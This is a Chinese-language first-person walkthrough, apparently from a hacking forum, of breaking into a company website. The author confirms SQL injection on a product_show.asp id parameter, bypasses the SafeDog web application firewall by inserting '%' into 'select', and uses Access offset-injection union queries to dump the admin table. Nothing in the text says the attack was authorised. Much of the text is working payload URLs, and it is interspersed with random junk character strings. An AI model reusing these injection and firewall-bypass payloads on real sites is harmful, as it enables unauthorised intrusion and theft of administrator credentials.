打开网站,一个企业站。
" q( Q+ Q6 A3 w, P# t# J9 E
5 }3 q m# o! T7 g& `
0 P" `: b- o4 t, ?& I" \: ?顺手加个admin9 G% {4 ?' o- u* X1 h2 F
5 J* e; Q( f6 z. y
2 L$ ]: S, P) _+ j4 K5 D) Z默认后台。
2 w# j& i' b+ _9 l$ } `! r回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。# q* `& r' K ~& C6 m- J9 i/ |
v# I q. d, @$ h4 i3 d
. P& j6 B; z# S
! Z) s, g7 R+ F
所以就不用御剑扫了,待会直接封IP。
# a% C/ B% d4 r( Z+ p
: m' J5 o* q, B$ `用order by语句判断是否存在注入。- p- [; v9 Y4 b
http://www.xxx.com /product_show.asp?id=997 order by 1
1 d" Q$ S# t4 c. R7 P: n" I# uhttp://www.xxx.com /product_show.asp?id=997 order by 100
5 f% E- ^5 u) y现在存在注入,经测试后发现是9个字段。" X6 o* q& o( D! U
# [" m" Q) G p: l9 [7 u T3 r接下来进行联合查询,猜是否存在admin表。8 }/ f6 R) ~( f7 J6 g0 }% V0 _
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。 h! S5 n/ ] B+ {! r; x1 n( W' J
5 K6 N* ]/ e8 f, `* o" u
4 r6 ]; m5 o" R
' X3 c; V. U6 _4 {6 q在select中间加个%,se%lect绕过安全狗。
# S, j! j& V+ {* D5 [4 f
* Q3 i$ n5 @( Q: H
' b" \7 S9 T9 a9 c/ c- D% z' X发现存在admin表,然后开始手工猜常用的字段。) Z/ X' z+ q+ g
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
/ C) R( D! e" N* y- J7 m/ `
% r7 n k* \. a7 h突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ {: w, |! N+ a% s# @, u
1 j+ N3 N7 O3 t" }2 _, F科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。7 Y2 }1 W! b8 e
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin# b) S! N/ L. @
好了,敏感内容出显了。
, G, q6 ]: s( C- t* l' Z. @
4 b Q& v# p- M; E, p) p, Y8 l
0 p3 N# R# u7 o2 i
& x* c: u& w2 Q |